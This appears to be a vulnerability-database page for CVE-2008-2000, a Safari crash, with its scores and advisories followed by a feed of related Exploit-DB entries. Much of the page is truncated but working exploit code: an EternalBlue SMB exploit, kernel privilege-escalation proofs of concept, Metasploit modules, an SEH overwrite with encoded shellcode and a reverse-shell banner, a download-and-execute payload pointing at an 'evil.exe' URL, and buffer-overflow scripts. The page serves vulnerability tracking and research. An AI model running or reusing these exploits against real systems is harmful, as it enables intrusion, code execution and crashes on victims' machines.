CVE-2008-2000
published 2008-04-28CVE-2008-2000: Unspecified vulnerability in Apple Safari 3.1.1 allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls…
PriorityP411medium4.3CVSS 2.0
AVNACMAuNCNINAP
EPSS
1.31%
67.8th percentile
Unspecified vulnerability in Apple Safari 3.1.1 allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls document.write in an infinite loop.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | safari | — | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:N/A:P
vendor_redhat9.3CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-m39r-vmgh-2hwm: Unspecified vulnerability in Apple Safari 3
ghsa_unreviewed·2022-05-01
CVE-2008-2000 [MEDIUM] GHSA-m39r-vmgh-2hwm: Unspecified vulnerability in Apple Safari 3
Unspecified vulnerability in Apple Safari 3.1.1 allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls document.write in an infinite loop.
Kernel
Merge tag 'xfs-5.17-merge-5' of git://git.kernel.org/pub/scm/fs/xfs/xfs-linux
kernel_security·2022-01-21
Merge tag 'xfs-5.17-merge-5' of git://git.kernel.org/pub/scm/fs/xfs/xfs-linux
Merge tag 'xfs-5.17-merge-5' of git://git.kernel.org/pub/scm/fs/xfs/xfs-linux
Pull xfs irix ioctl housecleaning from Darrick Wong:
"Remove the XFS_IOC_ALLOCSP* and XFS_IOC_FREESP* ioctl families.
This is the second of a series of small pull requests that perform
some long overdue housecleaning of XFS ioctls. This time, we're
vacating the implementation of all variants of the ALLOCSP and FREESP
ioctls, which are holdovers from EFS in Irix, circa 1993. Roughly
equivalent functionality have been available for both ioctls since
2.6.25 (April 2008):
- XFS_IOC_FREESP ftruncates a file.
- XFS_IOC_ALLOCSP is the equivalent of fallocate.
As noted in the fix patch for CVE 2021-4155, the ALLOCSP ioctl has
been serving up stale disk blocks since 2000, and in 21 years
**nobody** noticed. On those
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
Red Hat
jasper: integer overflow in the jas_matrix_create() function
vendor_redhat·2015-12-24·CVSS 9.3
CVE-2015-8751 [CRITICAL] CWE-190 jasper: integer overflow in the jas_matrix_create() function
jasper: integer overflow in the jas_matrix_create() function
Integer overflow in the jas_matrix_create function in JasPer allows context-dependent attackers to have unspecified impact via a crafted JPEG 2000 image, related to integer multiplication for memory allocation.
Statement: This issue did not affect the versions of jasper as shipped with Red Hat Enterprise Linux 6 and 7 as it was already fixed via CVE-2008-3520.
Package: netpbm (Red Hat Enterprise Linux 5) - Not affected
Package: jasper (Red Hat Enterprise Linux 6) - Not affected
Package: jasper (Red Hat Enterprise Linux 7) - Not affected
Package: mingw-virt-viewer (Red Hat Enterprise Virtualization 3) - Not affected
Red Hat
bind: implement source UDP port randomization (CERT VU#800113)
vendor_redhat·2008-07-08·CVSS 6.8
CVE-2008-1447 [MEDIUM] bind: implement source UDP port randomization (CERT VU#800113)
bind: implement source UDP port randomization (CERT VU#800113)
The DNS protocol, as implemented in (1) BIND 8 and 9 before 9.5.0-P1, 9.4.2-P1, and 9.3.5-P1; (2) Microsoft DNS in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2; and other implementations allow remote attackers to spoof DNS traffic via a birthday attack that uses in-bailiwick referrals to conduct cache poisoning against recursive resolvers, related to insufficient randomness of DNS transaction IDs and source ports, aka "DNS Insufficient Socket Entropy Vulnerability" or "the Kaminsky bug."
Red Hat
WebKit: DoS via JavaScript that calls document.write in an infinite loop
vendor_redhat·2008-04-22·CVSS 4.3
CVE-2008-2000 [MEDIUM] CWE-835 WebKit: DoS via JavaScript that calls document.write in an infinite loop
WebKit: DoS via JavaScript that calls document.write in an infinite loop
Unspecified vulnerability in Apple Safari 3.1.1 allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls document.write in an infinite loop.
Juniper
CVE-2008-1180: Cross-site scripting (XSS) vulnerability in dana-na/auth/rdremediate.cgi in Juniper Networks Secure Access 2000 5.5 R1 build 11711 allows remote attac
vendor_juniper·2008-03-06·CVSS 4.3
CVE-2008-1180 [MEDIUM] CWE-79 CVE-2008-1180: Cross-site scripting (XSS) vulnerability in dana-na/auth/rdremediate.cgi in Juniper Networks Secure Access 2000 5.5 R1 build 11711 allows remote attac
CVE-2008-1180: Cross-site scripting (XSS) vulnerability in dana-na/auth/rdremediate.cgi in Juniper Networks Secure Access 2000 5.5 R1 build 11711 allows remote attackers to inject arbitrary web script or HTML via the delivery_mode parameter.
Juniper
CVE-2008-1181: Juniper Networks Secure Access 2000 5.5 R1 (build 11711) allows remote attackers to obtain sensitive information via a direct request for remediate.cg
vendor_juniper·2008-03-06·CVSS 5.0
CVE-2008-1181 [MEDIUM] CWE-200 CVE-2008-1181: Juniper Networks Secure Access 2000 5.5 R1 (build 11711) allows remote attackers to obtain sensitive information via a direct request for remediate.cg
CVE-2008-1181: Juniper Networks Secure Access 2000 5.5 R1 (build 11711) allows remote attackers to obtain sensitive information via a direct request for remediate.cgi without certain parameters, which reveals the path in an "Execute failed" error message.
No detection rules found.
Exploit-DB
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
exploitdb·2017-07-11
CVE-2017-0144 Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
---
#!/usr/bin/python
from impacket import smb, smbconnection
from mysmb import MYSMB
from struct import pack, unpack, unpack_from
import sys
import socket
import time
'''
MS17-010 exploit for Windows 2000 and later by sleepya
EDB Note: mysmb.py can be found here ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42315.py
Note:
- The exploit should never crash a target (chance should be nearly 0%)
- The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed
Tested on:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1
Exploit-DB
Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring
exploitdb·2013-06-03
CVE-2013-3661 Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring
Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring
---
#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include
#include
#include
#include
#include
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
#include
#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
#pragma comment(lib, "shell32")
#pragma comment(linker, "/SECTION:.text,ERW")
#ifndef PAGE_SIZE
# define PAGE_SIZE 0x1000
#endif
#define MAX_POLYPOINTS (8192 * 3)
#define MAX_REGIONS 8192
#define CYCLE_TIMEOUT 10000
//
// --------------------------------------------------
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
// ----------------------------------------- taviso () cmpxchg8b com -----
//
// INTRODUCTION
//
// There's a pretty ob
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
exploitdb·2011-02-08
CVE-2008-5416 Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Window
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
exploitdb·2011-01-24
CVE-2008-5416 Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin.rb 11631 2011-01-24 19:37:58Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,
and Microsoft Desktop
Exploit-DB
SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)
exploitdb·2010-07-03
CVE-2008-6898 SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)
SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)
---
'SEH Overwrite exploited by Blake
'Original EIP method by callAX
'Tested on XP SP3/IE7 in virtualbox
'$ nc 192.168.1.155 4444
'Microsoft Windows XP [Version 5.1.2600]
'(C) Copyright 1985-2001 Microsoft Corp.
'
'C:\Documents and Settings\blake\Desktop>
buffer = String(8349, "A")
nseh = unescape("%eb%06%90%90") ' short jump
seh = unescape("%4E%20%D1%72") ' 0x72D1204E [msacm32.drv]
nops = String(20, unescape("%90")) ' nop sled
junk = String(2000, "C")
sc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%3
Exploit-DB
Microsoft Windows Outlook Express and Windows Mail - Integer Overflow
exploitdb·2010-05-11·CVSS 9.3
CVE-2010-0816 [CRITICAL] Microsoft Windows Outlook Express and Windows Mail - Integer Overflow
Microsoft Windows Outlook Express and Windows Mail - Integer Overflow
---
Application: Microsoft Outlook Express
Microsoft Windows Mail
Platforms: Windows 2000
Windows XP
Windows Vista
Windows server 2003
Windows Server 2008 SR2
Exploitation: Remote Exploitable
CVE Number: CVE-2010-0816
Discover Date: 2009-09-11
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code
#####################################################################################
1) Introduction
Windows Mail is an e-mail and newsgroup client included in Windows Vista, that was superseded by Wind
Exploit-DB
Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015)
exploitdb·2010-01-19·CVSS 7.8
CVE-2010-0232 [HIGH] Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015)
Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015)
---
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11199.zip (KiTrap0D.zip)
E-DB Note: Make sure to run "vdmallowed.exe" (pre-compiled) inside the subfolder.
Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
CVE-2010-0232
In order to support BIOS service routines in legacy 16bit applications, the
Windows NT Kernel supports the concept of BIOS calls in the Virtual-8086 mode
monitor code. These are implemented in two stages, the kernel transitions to
the second stage when the #GP trap handler (nt!KiTrap0D) detects that the
faulting cs:eip matches specific magic values.
Transitioning to the second stage involves
Exploit-DB
Snitz Forums 2000 - Database Disclosure
exploitdb·2009-12-24
CVE-2008-0135 Snitz Forums 2000 - Database Disclosure
Snitz Forums 2000 - Database Disclosure
---
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
[»] ~ Note : if the path of "snitz_forums_2000.mdb" has been changed this exploit will not work
[»] Snitz Forums 2000 Remote Database Disclosure Vulnerability
[»] Script: [ Snitz Forums ]
[»] Language: [ ASP ]
[»] Site page: [ Snitz Forums 2000 - free ASP-based Internet Discussion Forum Software ]
[»] Download: [ http://forum.snitz.com/specs.asp ]
[»] Founder: [ ViRuSMaN ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###################################################################
Exploit-DB
Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute
exploitdb·2009-01-01
CVE-2008-6748 Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute
Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute
---
Megacubo 5.0.7 download & Execute
by :JJunior
site: http://www.musicastop.com.br/
tested against Internet Explorer 7 and Mozilla Firefox 1.5 Windows Xp sp 3
software site: http://www.megacubo.net/tv/
download url: http://sourceforge.net/project/showfiles.php?group_id=231636&package_id=280849&release_id=608023
description:
"Megacubo is a IPTV tuner application written in PHP + Winbinder.
It has a catalogue of links of TV streams which are available
for free in the web. At the moment it only runs on Windows(2000,
XP and Vista)."
example exploit, download & Execute :
MegaCubo - download & Execute
// url download & exec code evil
evil = 'http://www.example.com/evil.exe';
// disable firewall encode base_64
firewall =
Exploit-DB
Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)
exploitdb·2008-11-16
CVE-2008-4250 Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)
Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)
---
#!/usr/bin/env python
#############################################################################
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
#
# E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploitdb/pull/77/files#diff-5247d21ae6747fa8543ef0ba9c06c0e2
#############################################################################
import struct
import sys
from threading import Thread #Thread is imported incase you would like to modify
#the src to run against multiple targets.
try:
from impacket import smb
from impacket import uuid
from impacket import dcerpc
from impacket.dcerpc.v5 import transpor
Exploit-DB
Microsoft Active Directory LDAP Server - 'Username' Enumeration
exploitdb·2008-11-14
CVE-2008-5112 Microsoft Active Directory LDAP Server - 'Username' Enumeration
Microsoft Active Directory LDAP Server - 'Username' Enumeration
---
source: https://www.securityfocus.com/bid/32305/info
Microsoft Active Directory is prone to a username-enumeration weakness because of a design error in the application when verifying user-supplied input.
Attackers may exploit this weakness to discern valid usernames. This may aid them in brute-force password cracking or other attacks.
This issue affects Active Directory on these versions of Windows:
Windows 2000 SP4
Windows Server 2003 SP1 and SP2
Other versions may also be affected.
#!/usr/bin/env python
'''
Microsoft Windows Active Directory LDAP Server Information
Disclosure Vulnerability Exploit
(c) 2008 Bernardo Damele A. G.
License: GPLv2
Version: 0.1
References:
* http://labs.portcullis.co.uk/applicatio
Exploit-DB
Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation
exploitdb·2008-10-27
CVE-2008-4210 Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation
Linux Kernel
bug information:
http://osvdb.org/49081
!!!This is for educational purposes only!!!
To use it, you've got to find a sgid directory you've got
permissions to write into (obviously world-writable), e.g:
find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx"
which fortunately is not common those days :)
And also a shell that does not drop sgid privs upon execution (like ash/sash).
E.g:
test:/fileserver/samba$ ls -ld
drwxrwsrwx 2 root root 4096 2008-10-27 16:27.
test:/fileserver/samba$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
test:/fileserver/samba$ /tmp/gw-ftrex
ash shell found!
size=80200
We're evil evil evil!
$ id
uid=33(www-data) gid=33(www-data) egid=0(root) groups=33(www-data)
Trqbva da kaja neshto umno kato zakliuchenie...ma sega ne moga da se
Exploit-DB
FastStone Image Viewer 3.6 - '.BMP' Image Crash
exploitdb·2008-10-05
CVE-2008-5870 FastStone Image Viewer 3.6 - '.BMP' Image Crash
FastStone Image Viewer 3.6 - '.BMP' Image Crash
---
Name : FastStone Image Viewer v3.6 (malformed bmp image) DoS Exploit
Credit : suN8Hclf (DaRk-CodeRs Group), [email protected]
Download: : http://www.FastStone.org
Greetz : Luigi Auriemma, 0in, cOndemned, e.wiZz!, Gynvael Coldwind,
Katharsis, all from #dark-coders and others;]
PoC:
#!/usr/local/bin/perl
# Open file (File->Open) or simply click on the image miniature
# FastStone Image Viewer v3.6 simply crashes
# Tested on Windows 2000 SP4
#-----INFO----------------------
#EAX 00002847
#ECX 00000000
#EDX 00402818 dumped_F.00402818
#EBX 00402818 dumped_F.00402818
#ESP 00402818 dumped_F.00402818
#EBP 0012DF08
#ESI 00402818 dumped_F.00402818
#EDI 000161E8
#EIP 012F0447
#
#Reason: "Access violation when writing to [00002847]
#-----INFO
Exploit-DB
AyeView 2.20 - '.GIF' Image Local Crash
exploitdb·2008-10-04
CVE-2008-5884 AyeView 2.20 - '.GIF' Image Local Crash
AyeView 2.20 - '.GIF' Image Local Crash
---
Name : AyeView v2.20 (malformed gif image) DoS Exploit
Credit : suN8Hclf (DaRk-CodeRs Group), [email protected]
Download: : http://www.ayeview.com/downloads.htm
Greetz : Luigi Auriemma, 0in, cOndemned, e.wiZz!, Gynvael Coldwind,
Katharsis, all from #dark-coders and others;]
PoC:
#!/usr/local/bin/perl
# Open file (File->Open) or simply click on the image miniature
# AyeView freezes and after few seconds crashes...
# Tested on Windows XP SP2 & Windows 2000 SP4
my $code="\x47\x49\x46\x38\x39\x61\xff\xff\xff\xff\x0e".
"\x00\x00\x2c\x00\x00\x00\x00\xff\xff\xff\xff\x00";
my $file="open_me.gif";
open(my $FILE, ">>$file") or die "[!]Cannot open file";
print $FILE $code;
close($FILE);
print "$file has been generated\n"
print "Credit: suN8Hclf,
Exploit-DB
VMware - COM API ActiveX Remote Buffer Overflow (PoC)
exploitdb·2008-09-01
CVE-2008-3892 VMware - COM API ActiveX Remote Buffer Overflow (PoC)
VMware - COM API ActiveX Remote Buffer Overflow (PoC)
---
VMWare COM API Buffer Overflow
url: http://www.vmware.com/
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.net
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
Sub tryMe
buff_1 = String (2000, "a")
buff_2 = String (2000, "b")
test.GuestInfo (buff_1) = buff_2
End Sub
Dump:
09:25:39.339 pid=0640 tid=0504 EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [00000070])
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ??
Exploit-DB
Microsoft Word 2000/2002 - Bulleted List Handling Remote Memory Corruption
exploitdb·2008-06-17
CVE-2008-2752 Microsoft Word 2000/2002 - Bulleted List Handling Remote Memory Corruption
Microsoft Word 2000/2002 - Bulleted List Handling Remote Memory Corruption
---
source: https://www.securityfocus.com/bid/29769/info
Microsoft Word is prone to a remote memory-corruption vulnerability.
An attacker could exploit this issue by enticing a victim to open and interact with malicious Word files.
Successfully exploiting this issue will corrupt memory and crash the application. Given the nature of this issue, attackers may also be able to execute arbitrary code in the context of the currently logged-in user.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31934-1.doc
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31934-2.doc
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31934
Exploit-DB
QuickerSite 1.8.5 - Multiple Vulnerabilities
exploitdb·2008-06-03
CVE-2008-6678 QuickerSite 1.8.5 - Multiple Vulnerabilities
QuickerSite 1.8.5 - Multiple Vulnerabilities
---
########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: QuickerSite Multiple Vulnerabilities
# Vendor: www.quickersite.com
# Vulnerable Version: 1.8.5
# Exploit: Available
# Impact: High
# Fix: N/A
# Original Advisory: http://bugreport.ir/index.php?/39
###################################################################################
####################
1. Description:
####################
QuickerSite is a Content Management System for Windows Servers. It is written in ASP/VBScript with an optional pinch of ASP.NET for true image-resizing capabilities. QuickerSite ships with an Access database, with the option to upsize to SQL Server 2000/2005 for busy sites (>1
Exploit-DB
Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow
exploitdb·2008-05-29
CVE-2008-0871 Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow
Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow
---
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Now SMS/MMS Gateway v5.5 and others
* ----------------------------------------
* Exploit : Now SMS/MMS Gateway v5.5 Remote Buffer Overflow Exploit
* Exploit date : 14.04.2008
* Exploit writer : Heretic2 ([email protected])
* OS : Windows ALL
* Tested : Windows 2000 Server
* Crew : Dreatica-FXP
* Location : http://www.milw0rm.com/
* ----------------------------------------
* Info : We obtain EIP after sending a long Authentificate request to server
* Egghunter help here.
* ----------------------------------------
* Thanks to:
* 1. Luigi Auriemma ( http://aluigi.org )
* 2. The Metasploit project ( http://metasploit.com )
* 3. ALPHA 2: Zero-tolerance ( )
* 4. D
Exploit-DB
ClanLite 2.x - SQL Injection / Cross-Site Scripting
exploitdb·2008-05-12
CVE-2008-5215 ClanLite 2.x - SQL Injection / Cross-Site Scripting
ClanLite 2.x - SQL Injection / Cross-Site Scripting
---
########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ##############################
ClanLite V2 SQL inj. & XSS
dork: Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005
dork: Themed By Ray © 2003, 2004 iOptional
readme script
/****************************************************************************
* Fichier : *
* Copyright : (C) 2004 ClanLite V2 *
* Email : [email protected] *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
******************************************************************
Exploit-DB
BigAnt Server 2.2 - Remote Overflow (SEH)
exploitdb·2008-04-15
CVE-2008-1914 BigAnt Server 2.2 - Remote Overflow (SEH)
BigAnt Server 2.2 - Remote Overflow (SEH)
---
#!/usr/bin/python
###############################################################################
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# www.be4mind.com - www.gray-world.net
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe
# Offset for SEH overwrite is 954 Bytes
#
#------------------------------------------------------------------------------
# muts you gave me the wrong pill! it's your fault!!!
# I wanna go back to the matrix
#------------------------------------------------------------------------------
#
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on 1
Exploit-DB
Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)
exploitdb·2008-04-08
CVE-2008-1084 Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)
Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)
---
/*
source: https://www.securityfocus.com/bid/28554/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
The vulnerability resides in the Windows kernel. A locally logged-in user can exploit this issue to gain kernel-level access to the operating system.
*/
#include
#include
int main(int argc,char *argv[])
{
DWORD dwHookAddress = 0x80000000;
printf( "\tMS08-025 Local Privilege Escalation Vulnerability Exploit(POC)\n\n" );
printf( "Create by Whitecell's [email protected] 2008/04/10\n" );
SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress );
return 0;
}
Exploit-DB
Noticeware Email Server 4.6.1.0 - Denial of Service
exploitdb·2008-04-01
CVE-2008-1713 Noticeware Email Server 4.6.1.0 - Denial of Service
Noticeware Email Server 4.6.1.0 - Denial of Service
---
#NoticeWare Email Server
#Application: Noticeware Email Server
#Version: 4.6.1.0 (NoticeWare Email Server)
#Bugs: Denial Of Service/ Remote Crash
#Exploitation: Remote
#Date: 1st April 2008
#Author: Ray
#Email: [email protected]
#Platforms: Tested on XP/2003
#Taken from : http://www.noticeware.com/noticemail.htm
#"The NoticeWare™ Email Server NG is a high performance, multi-threaded email server for Windows #2000/2003/XP/Vista which supports IMAP/POP3 and SMTP protocols. Whether you are hosting your own email or #collecting mail from your ISP, the NoticeWare™ Email Server will provide everything you need to run a #secure and dependable email system. Ideal for any size of business."
##############################################
Exploit-DB
NetWin Surgemail 3.8k4-4 - IMAP (Authenticated) Remote LIST Universal
exploitdb·2008-03-14
CVE-2008-1498 NetWin Surgemail 3.8k4-4 - IMAP (Authenticated) Remote LIST Universal
NetWin Surgemail 3.8k4-4 - IMAP (Authenticated) Remote LIST Universal
---
#!/usr/bin/python
###############################################################################
#
# NetWin Surgemail 0DAY (IMAP POST AUTH) Remote LIST Universal Exploit
# Discovered and coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : Version 3.8k4-4 Windows Platform
# Tested on OS : Windows 2000 SP4 English
# Windows XP Sp2 English
# Windows 2003 Standard Edition Italian
# Discovery Date : 03/13/2008
#
#-----------------------------------------------------------------------------
#
# Thx to muts _[at]_ offensive-security.com
# for the "Partial Overwrite" Suggestion :) Now I know it works!
#
#-------------------------------------------------------------
Exploit-DB
Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow
exploitdb·2008-03-13
CVE-2008-1358 Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow
Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow
---
#!/usr/bin/python
###############################################################################
#
# MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND UNIVERSAL EXPLOIT 0day
# Bug discovered and coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : MDaemon IMAP server v9.6.4
# Tested on OS : Windows 2000 SP4 English
# Windows XP Sp2 English
# Windows 2003 Standard Edition Italian
# Discovery Date : 03/13/2008
#
#-----------------------------------------------------------------------------
#
# muts AS YOU CAN SEE, I ALWAYS MAINTAIN MY PROMISES! LOL
#
# Thx to Silvia for feeding my obsessions
# Thx to didNot at #offsec
# (yes he doesn't look like Silvia but he's a
Exploit-DB
MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Denial of Service
exploitdb·2008-03-11
CVE-2008-1275 MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Denial of Service
MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Denial of Service
---
#!/usr/bin/python
##########################################################################
#
# MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow ( DoS )
# Bug discovered by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : Standard Edition all versions
# Professional Edition all versions
# Enterprise Edition all versions
# Tested on OS : Windows 2000 SP4 English
# Windows 2003 Standard Edition Italian
# Windows XP SP2 English
# Discovery Date : 02/24/2008
# Initial vendor notification : 03/06/2008
# Coordinated public disclosure: 03/11/2008
#
# CONGRATS TO THE MAILENABLE TEAM: VERY FAST IN PATCHING AND ANSWERING!!
#
#-----------------------------------------------
Exploit-DB
Microsoft Office 2000/2003/2004/XP - File Memory Corruption
exploitdb·2008-03-07
CVE-2008-0118 Microsoft Office 2000/2003/2004/XP - File Memory Corruption
Microsoft Office 2000/2003/2004/XP - File Memory Corruption
---
source: https://www.securityfocus.com/bid/28146/info
Microsoft Office is prone to a remote memory-corruption vulnerability.
An attacker could exploit this issue by enticing a victim to open a malicious Office file.
Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31361.tgz
Exploit-DB
Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross-Site Scripting
